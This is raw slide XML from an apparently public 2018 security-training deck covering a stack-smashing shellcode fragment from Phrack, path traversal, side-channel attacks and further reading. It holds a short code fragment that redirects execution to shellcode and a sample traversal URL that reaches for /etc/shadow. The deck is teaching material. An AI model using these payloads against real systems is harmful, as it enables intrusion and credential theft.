                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t>)shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2555" name="C"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="26264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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2556" name="http://phrack.org/issues/49/14.html#article"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/49/14.html#article</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2557" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2558" name="Probably best not to run random code from the internet. Read the linked article first, and run at your own risk."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567709" y="12204549"/>
            <a:ext cx="12382055" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A7AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Probably best not to run random code from the internet. Read the linked article first, and run at your own risk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2559" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10555615" y="11609840"/>
            <a:ext cx="308561" cy="528206"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-62046" y="5412368"/>
            <a:ext cx="24508091" cy="2891264"/>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2564" name="Path Traversal"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2565"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566"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567" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2568" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2569" name="https://example.com/../../../../etc/shadow"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296533" y="6392862"/>
            <a:ext cx="11790934"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>https://example.com/../../../../etc/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2570" name="https://github.com/rubyzip/rubyzip/issues/315"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8566286" y="10807710"/>
            <a:ext cx="7251428" cy="57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800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/rubyzip/rubyzip/issues/315</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2571" name="Vulnerabilities can exist in dependencies!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319062" y="9781666"/>
            <a:ext cx="1174587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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Vulnerabilities can exist in dependencies!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="Side-Channel Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Side-Channel Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2576" name="Timing Attack.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Timing Attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Power Analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Acoustic Cryptanalysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Data Remanence.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2577"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578"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579" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2580" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2581" name="https://www.youtube.com/watch?v=FKXOucXB4a8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=FKXOucXB4a8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2582" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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6" name="Side-Channel Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Side-Channel Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2587" name="Timing Attack. Use different timings to infer data.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timing Attack.</a:t>
            </a:r>
            <a:r>
              <a:t> Use different timings to infer data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Power Analysis. </a:t>
            </a:r>
            <a:r>
              <a:t>Use power usage to infer data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acoustic Cryptanalysis.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>Use sound to infer data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Remanence.</a:t>
            </a:r>
            <a:r>
              <a:t> Recover “deleted” data from storage.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2588"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58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590" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2591" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2592" name="https://www.youtube.com/watch?v=FKXOucXB4a8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=FKXOucXB4a8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2593" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2598" name="https://en.wikipedia.org/wiki/Data_Encryption_Standard#NSA's_involvement_in_the_design (Also http://simson.net/ref/1994/coppersmith94.pdf)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="518583" indent="-518583" defTabSz="690086">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Data_Encryption_Standard#NSA's_involvement_in_the_design</a:t>
            </a:r>
            <a:r>
              <a:t> (Also </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://simson.net/ref/1994/coppersmith94.pdf</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518583" indent="-518583" defTabSz="690086">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Differential_cryptanalysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518583" indent="-518583" defTabSz="690086">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Power_analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518583" indent="-518583" defTabSz="690086">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId7" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.nsa.gov/news-features/declassified-documents/cryptologic-histories/assets/files/cold_war_iii.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518583" indent="-518583" defTabSz="690086">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId8" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.theregister.co.uk/2001/01/25/directv_attacks_hacked_smart_cards/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2599" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2600"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601" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2602" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2603" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2604" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4209" y="4326643"/>
            <a:ext cx="1920859" cy="1440644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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611" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-20307" y="-38580"/>
            <a:ext cx="24424614" cy="13886028"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="24424613" cy="13886026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2608" name="band.png" descr="band.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
